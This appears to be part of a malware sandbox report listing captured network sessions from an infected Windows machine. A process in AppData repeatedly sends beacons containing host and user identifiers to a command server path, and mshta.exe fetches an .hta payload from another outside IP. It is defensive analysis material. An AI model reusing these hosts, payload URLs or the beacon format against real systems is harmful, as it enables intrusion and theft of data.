                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    14192.168.2.224918394.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:10.527065039 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:10.533828974 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:11.261435032 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:11 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    15192.168.2.2249184192.3.243.136803424C:\Windows\System32\mshta.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:10.540910959 CET509OUTGET /xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta HTTP/1.1
                                                                    Accept: */*
                                                                    Accept-Language: en-US
                                                                    UA-CPU: AMD64
                                                                    Accept-Encoding: gzip, deflate
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    If-Modified-Since: Wed, 20 Nov 2024 01:22:20 GMT
                                                                    Connection: Keep-Alive
                                                                    Host: 192.3.243.136
                                                                    If-None-Match: "2c850-6274dfb369376"
                                                                    Nov 20, 2024 07:57:11.112638950 CET275INHTTP/1.1 304 Not Modified
                                                                    Date: Wed, 20 Nov 2024 06:57:10 GMT
                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                    Last-Modified: Wed, 20 Nov 2024 01:22:20 GMT
                                                                    ETag: "2c850-6274dfb369376"
                                                                    Accept-Ranges: bytes
                                                                    Keep-Alive: timeout=5, max=100
                                                                    Connection: Keep-Alive


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    16192.168.2.224918594.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:11.422688007 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:11.427592039 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:12.155327082 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:12 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    17192.168.2.224918694.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:12.352430105 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:12.359101057 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:13.064924955 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:12 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    18192.168.2.224918794.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:13.464530945 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:13.469417095 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:14.190033913 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:14 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    19192.168.2.224918894.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:14.816301107 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:14.821225882 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:15.539246082 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:15 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    20192.168.2.224918994.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:15.714570045 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:15.719444990 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:16.455482960 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:16 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    21192.168.2.224919094.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:16.621402025 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:16.626398087 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:17.347266912 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:17 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    22192.168.2.224919194.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:17.498769045 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:17.507138014 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:18.216984034 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:18 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    23192.168.2.224919294.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:18.360862017 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:18.365734100 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:19.096231937 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:18 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    24192.168.2.224919394.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:19.248756886 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:19.253732920 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:20.092386961 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:19 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    25192.168.2.224919494.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:20.468795061 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:20.473746061 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:21.191966057 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:21 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    26192.168.2.224919594.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:21.594352007 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:21.599286079 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:25.322678089 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:25 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    27192.168.2.224919694.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:25.460459948 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:25.465375900 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:26.325515985 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:26 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    28192.168.2.224919794.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:26.469594002 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:26.474558115 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:27.207211971 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:27 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    29192.168.2.224919894.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:27.348721027 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:27.353741884 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:28.068264961 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:27 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    30192.168.2.224919994.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:28.247658014 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:28.253668070 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:28.977535009 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:28 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    31192.168.2.224920094.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:29.120889902 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:29.125787973 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:29.974338055 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:29 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    32192.168.2.224920194.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:30.109941006 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:30.114919901 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:30.837785006 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:30 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


